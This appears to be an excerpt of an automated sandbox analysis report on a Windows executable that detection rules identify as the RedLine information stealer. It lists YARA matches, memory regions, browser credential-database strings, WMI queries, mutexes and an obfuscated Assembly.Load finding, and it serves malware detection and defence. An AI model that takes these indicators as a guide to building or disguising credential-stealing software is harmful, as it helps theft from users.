                    Source: tmpB5A.tmp.2.dr, tmpB9E.tmp.2.dr, tmpBC1.tmp.2.dr, tmpBD2.tmp.2.dr, tmpBB1.tmp.2.dr, tmpBB0.tmp.2.dr, tmpB8D.tmp.2.dr, tmpB9F.tmp.2.dr, tmpB7D.tmp.2.dr, tmpB7C.tmp.2.dr, tmpB59.tmp.2.dr, tmpB6B.tmp.2.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

                    System Summary

                    barindex
                    Source: 2.2.9dOKGgFNL2.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 2.2.9dOKGgFNL2.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 0.2.9dOKGgFNL2.exe.458a6f0.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 0.2.9dOKGgFNL2.exe.458a6f0.2.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 0.2.9dOKGgFNL2.exe.45a2510.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 0.2.9dOKGgFNL2.exe.45a2510.1.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 0.2.9dOKGgFNL2.exe.45a2510.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 0.2.9dOKGgFNL2.exe.45a2510.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 0.2.9dOKGgFNL2.exe.458a6f0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 0.2.9dOKGgFNL2.exe.458a6f0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 00000002.00000002.1857246057.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 00000000.00000002.1741382956.0000000004491000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 00000000.00000002.1741382956.000000000458A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: Process Memory Space: 9dOKGgFNL2.exe PID: 7536, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: Process Memory Space: 9dOKGgFNL2.exe PID: 7712, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeCode function: 0_2_031F3E280_2_031F3E28
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeCode function: 0_2_031F6F900_2_031F6F90
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeCode function: 0_2_031FF0440_2_031FF044
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeCode function: 0_2_065994F00_2_065994F0
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeCode function: 0_2_065911FC0_2_065911FC
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeCode function: 0_2_065935BA0_2_065935BA
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeCode function: 0_2_07D797080_2_07D79708
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeCode function: 0_2_07D73E380_2_07D73E38
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeCode function: 0_2_07D73E290_2_07D73E29
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeCode function: 0_2_07D735A80_2_07D735A8
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeCode function: 0_2_07D73A000_2_07D73A00
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeCode function: 0_2_07D759B00_2_07D759B0
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeCode function: 0_2_07D750D80_2_07D750D8
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeCode function: 2_2_013EE7B02_2_013EE7B0
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeCode function: 2_2_013EDC902_2_013EDC90
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeCode function: 2_2_067D96302_2_067D9630
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeCode function: 2_2_067D44682_2_067D4468
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeCode function: 2_2_067D12102_2_067D1210
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeCode function: 2_2_067D329F2_2_067D329F
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeCode function: 2_2_067DDD182_2_067DDD18
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeCode function: 2_2_067DDA242_2_067DDA24
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeCode function: 2_2_067DD5282_2_067DD528
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeCode function: 2_2_071FC1982_2_071FC198
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeCode function: 2_2_071FEAC02_2_071FEAC0
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeCode function: 2_2_071F075A2_2_071F075A
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeCode function: 2_2_071F07682_2_071F0768
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeCode function: 2_2_071FF2582_2_071FF258
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeCode function: 2_2_071FF2482_2_071FF248
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeCode function: 2_2_071F0CF42_2_071F0CF4
                    Source: 9dOKGgFNL2.exe, 00000000.00000002.1742563541.0000000005E60000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs 9dOKGgFNL2.exe
                    Source: 9dOKGgFNL2.exe, 00000000.00000002.1741382956.000000000458A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameImplosions.exe4 vs 9dOKGgFNL2.exe
                    Source: 9dOKGgFNL2.exe, 00000000.00000002.1741382956.000000000458A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs 9dOKGgFNL2.exe
                    Source: 9dOKGgFNL2.exe, 00000000.00000002.1740909601.00000000033E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameImplosions.exe4 vs 9dOKGgFNL2.exe
                    Source: 9dOKGgFNL2.exe, 00000000.00000000.1684748049.0000000001074000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamenmYV.exe* vs 9dOKGgFNL2.exe
                    Source: 9dOKGgFNL2.exe, 00000000.00000002.1743705514.0000000007D00000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs 9dOKGgFNL2.exe
                    Source: 9dOKGgFNL2.exe, 00000000.00000002.1740116770.00000000016BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs 9dOKGgFNL2.exe
                    Source: 9dOKGgFNL2.exe, 00000002.00000002.1858196730.0000000001108000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs 9dOKGgFNL2.exe
                    Source: 9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs 9dOKGgFNL2.exe
                    Source: 9dOKGgFNL2.exe, 00000002.00000002.1857246057.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameImplosions.exe4 vs 9dOKGgFNL2.exe
                    Source: 9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000003103000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamefirefox.exe0 vs 9dOKGgFNL2.exe
                    Source: 9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000003103000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs 9dOKGgFNL2.exe
                    Source: 9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000003103000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $fq,\\StringFileInfo\\000004B0\\OriginalFilename vs 9dOKGgFNL2.exe
                    Source: 9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000003103000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamechrome.exe< vs 9dOKGgFNL2.exe
                    Source: 9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000003103000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $fq,\\StringFileInfo\\040904B0\\OriginalFilename vs 9dOKGgFNL2.exe
                    Source: 9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000003103000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameIEXPLORE.EXE.MUID vs 9dOKGgFNL2.exe
                    Source: 9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000003103000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameIEXPLORE.EXED vs 9dOKGgFNL2.exe
                    Source: 9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000003103000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $fq,\\StringFileInfo\\080904B0\\OriginalFilename vs 9dOKGgFNL2.exe
                    Source: 9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000003103000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsedge.exe> vs 9dOKGgFNL2.exe
                    Source: 9dOKGgFNL2.exeBinary or memory string: OriginalFilenamenmYV.exe* vs 9dOKGgFNL2.exe
                    Source: 9dOKGgFNL2.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 2.2.9dOKGgFNL2.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 2.2.9dOKGgFNL2.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 0.2.9dOKGgFNL2.exe.458a6f0.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 0.2.9dOKGgFNL2.exe.458a6f0.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 0.2.9dOKGgFNL2.exe.45a2510.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 0.2.9dOKGgFNL2.exe.45a2510.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 0.2.9dOKGgFNL2.exe.45a2510.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 0.2.9dOKGgFNL2.exe.45a2510.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 0.2.9dOKGgFNL2.exe.458a6f0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 0.2.9dOKGgFNL2.exe.458a6f0.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 00000002.00000002.1857246057.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 00000000.00000002.1741382956.0000000004491000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 00000000.00000002.1741382956.000000000458A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: Process Memory Space: 9dOKGgFNL2.exe PID: 7536, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: Process Memory Space: 9dOKGgFNL2.exe PID: 7712, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 9dOKGgFNL2.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: 0.2.9dOKGgFNL2.exe.7d00000.4.raw.unpack, demNsXKQQ5dOWKyKaT.csSecurity API names: _0020.SetAccessControl
                    Source: 0.2.9dOKGgFNL2.exe.7d00000.4.raw.unpack, demNsXKQQ5dOWKyKaT.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.9dOKGgFNL2.exe.7d00000.4.raw.unpack, demNsXKQQ5dOWKyKaT.csSecurity API names: _0020.AddAccessRule
                    Source: 0.2.9dOKGgFNL2.exe.45c6af0.0.raw.unpack, iZq82EZ6VPakI888Ti.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.9dOKGgFNL2.exe.7d00000.4.raw.unpack, iZq82EZ6VPakI888Ti.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.9dOKGgFNL2.exe.45c6af0.0.raw.unpack, demNsXKQQ5dOWKyKaT.csSecurity API names: _0020.SetAccessControl
                    Source: 0.2.9dOKGgFNL2.exe.45c6af0.0.raw.unpack, demNsXKQQ5dOWKyKaT.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.9dOKGgFNL2.exe.45c6af0.0.raw.unpack, demNsXKQQ5dOWKyKaT.csSecurity API names: _0020.AddAccessRule
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@4/43@1/1
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\9dOKGgFNL2.exe.logJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeMutant created: NULL
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeMutant created: \Sessions\1\BaseNamedObjects\YUNDhpkGx
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7728:120:WilError_03
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeFile created: C:\Users\user\AppData\Local\Temp\tmpD144.tmpJump to behavior
                    Source: 9dOKGgFNL2.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: 9dOKGgFNL2.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: tmpD177.tmp.2.dr, tmpD19B.tmp.2.dr, tmpD18A.tmp.2.dr, tmpD19A.tmp.2.dr, tmpD189.tmp.2.dr, tmpD178.tmp.2.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: 9dOKGgFNL2.exeReversingLabs: Detection: 66%
                    Source: 9dOKGgFNL2.exeVirustotal: Detection: 62%
                    Source: unknownProcess created: C:\Users\user\Desktop\9dOKGgFNL2.exe "C:\Users\user\Desktop\9dOKGgFNL2.exe"
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess created: C:\Users\user\Desktop\9dOKGgFNL2.exe "C:\Users\user\Desktop\9dOKGgFNL2.exe"
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess created: C:\Users\user\Desktop\9dOKGgFNL2.exe "C:\Users\user\Desktop\9dOKGgFNL2.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeSection loaded: iconcodecservice.dllJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: 9dOKGgFNL2.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: 9dOKGgFNL2.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: 9dOKGgFNL2.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: nmYV.pdb source: 9dOKGgFNL2.exe
                    Source: Binary string: nmYV.pdbSHA256 source: 9dOKGgFNL2.exe

                    Data Obfuscation

                    barindex
                    Source: 0.2.9dOKGgFNL2.exe.45c6af0.0.raw.unpack, demNsXKQQ5dOWKyKaT.cs.Net Code: CuR0MWy3sX System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.9dOKGgFNL2.exe.7d00000.4.raw.unpack, demNsXKQQ5dOWKyKaT.cs.Net Code: CuR0MWy3sX System.Reflection.Assembly.Load(byte[])
